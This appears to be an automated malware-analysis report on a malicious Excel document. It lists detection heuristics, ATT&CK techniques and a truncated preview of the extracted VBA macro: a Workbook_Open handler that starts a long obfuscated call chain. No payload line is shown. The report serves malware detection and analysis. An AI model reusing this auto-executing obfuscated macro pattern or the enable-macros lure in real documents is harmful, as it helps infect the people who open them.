MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is an Excel document containing a Workbook_Open VBA macro that executes a Shell() command. This macro is designed to bypass security by displaying a fake error message, instructing the user to enable macros. The ClamAV detection name suggests this is a known malware variant.
Heuristics 7
-
ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 110056 bytes |
SHA-256: 1c9b72ffc6da7e5579f8d1d32dee4cf04a71c965b5095307311829c2347e2cef |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Version"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Version1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WorKbOoK_Open(): Call DCWqlpYIhUjmZTd: End Sub
Sub DCWqlpYIhUjmZTd()
Call zIfSztfIWPVtIjm
End Sub
Private Sub zIfSztfIWPVtIjm()
Call jfpsZJZnzGRQPgw
End Sub
Static Sub jfpsZJZnzGRQPgw()
Call NnmPRfXsyBRxemt
End Sub
Static Sub NnmPRfXsyBRxemt()
Call SsbUqajqIwXrXHj
End Sub
Static Sub SsbUqajqIwXrXHj()
Call sYWDqAulvmpCLTd
End Sub
Static Function sYWDqAulvmpCLTd() As Currency
Call czPqdRHtwuoMKOY
End Function
Sub czPqdRHtwuoMKOY()
Call WNpFdXkIQoPvkxy
End Sub
Function WNpFdXkIQoPvkxy() As Currency
Call rXGBKCdPuiwpoxP
End Function
Private Function rXGBKCdPuiwpoxP()
Call UnULnZwiYblyuWd
End Function
Static Function UnULnZwiYblyuWd()
Call XAZCyWeuMUfTfLi
End Function
Static Function XAZCyWeuMUfTfLi() As String
Call UySsbZQhVQczXIb
End Function
Function UySsbZQhVQczXIb() As Object
Call GNMePnpxUJkvnmV
End Function
Private Sub GNMePnpxUJkvnmV()
Call zjCgAuoaSBAEEpL
End Sub
Private Sub zjCgAuoaSBAEEpL()
Call TAjOSaCwbuVaAIs
End Sub
Sub TAjOSaCwbuVaAIs()
Call QxigeiTRQIAKcIA
End Sub
Function QxigeiTRQIAKcIA() As Object
Call SREKZgXrjAjGERW
End Function
Private Function SREKZgXrjAjGERW() As Currency
Call OXNmokesXvVNnhf
End Function
Private Function OXNmokesXvVNnhf() As Double
Call yuXMNAYXBmSkuep
End Function
Static Function yuXMNAYXBmSkuep() As Date
Call cDUjFWWcAhSRJkn
End Function
Static Function cDUjFWWcAhSRJkn() As Long
Call hHKofRiaJcXLCGc
End Function
Private Sub hHKofRiaJcXLCGc()
Call tTvHBFWjSVkTwAN
End Sub
Static Function tTvHBFWjSVkTwAN() As Object
Call uvhXiEwYRMIqPcz
End Function
Static Function uvhXiEwYRMIqPcz() As Byte
Call oJHmhKZmkGjYpLZ
End Function
Private Function oJHmhKZmkGjYpLZ() As Object
Call JTYiOoSuOAQTtLq
End Function
Private Function JTYiOoSuOAQTtLq() As Double
Call mjmssMlNstFczkE
End Function
Private Sub mjmssMlNstFczkE()
Call pwrjCITZgmzxkZJ
End Sub
Function pwrjCITZgmzxkZJ() As Boolean
Call mukZfLFLqiwdcWC
End Function
Function mukZfLFLqiwdcWC() As Long
Call YJeMUadcobEZsAw
End Function
Private Sub YJeMUadcobEZsAw()
Call OykAplnKUiAYjnE
End Sub
Sub OykAplnKUiAYjnE()
Call iQSiHRBfdaWueGl
End Sub
Function iQSiHRBfdaWueGl() As Single
Call vTnPsETbHVubiiH
End Function
Private Function vTnPsETbHVubiiH() As Integer
Call xnIsoBXBbOdXJqc
End Function
Private Function xnIsoBXBbOdXJqc() As Currency
Call ttSVCGeCPIPesGm
End Function
Static Function ttSVCGeCPIPesGm() As Double
Call dQcucVYhtAMAzEv
End Function
Function dQcucVYhtAMAzEv() As Date
Call HZZSUsWmruMiOJt
End Function
Private Sub HZZSUsWmruMiOJt()
Call MeOWtnjkBpRcHfi
End Sub
Static Sub MeOWtnjkBpRcHfi()
Call YpzpPbWtKjfkCZU
End Sub
Function YpzpPbWtKjfkCZU() As Object
Call ZRmGwawiIaCHUBF
End Function
Private Function ZRmGwawiIaCHUBF() As Date
Call TfLVwfZwcTdpulf
End Function
Private Sub TfLVwfZwcTdpulf()
Call opdQdKSEGNKkzlw
End Sub
Static Function opdQdKSEGNKkzlw() As Double
Call RFqbGilXkGzsFJK
End Function
Function RFqbGilXkGzsFJK() As Double
Call USwSQeTjYAtNpyQ
End Function
Function USwSQeTjYAtNpyQ() As Boolean
Call RQpHuhFVhwquhvJ
End Function
Private Function RQpHuhFVhwquhvJ() As Long
Call NYlicjzWkzFSYVA
End Function
Static Function NYlicjzWkzFSYVA() As Double
Call GubjNqyzjrUbpYp
End Function
Static Sub GubjNqyzjrUbpYp()
Call MrABBkpjNnlvraO
End Sub
Static Sub MrABBkpjNnlvraO()
Call nPeyQJeQWfOeoSs
End Sub
Private Sub nPeyQJeQWfOeoSs()
Call pkAcMHiqpXxaPbO
End Sub
Static Sub pk
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.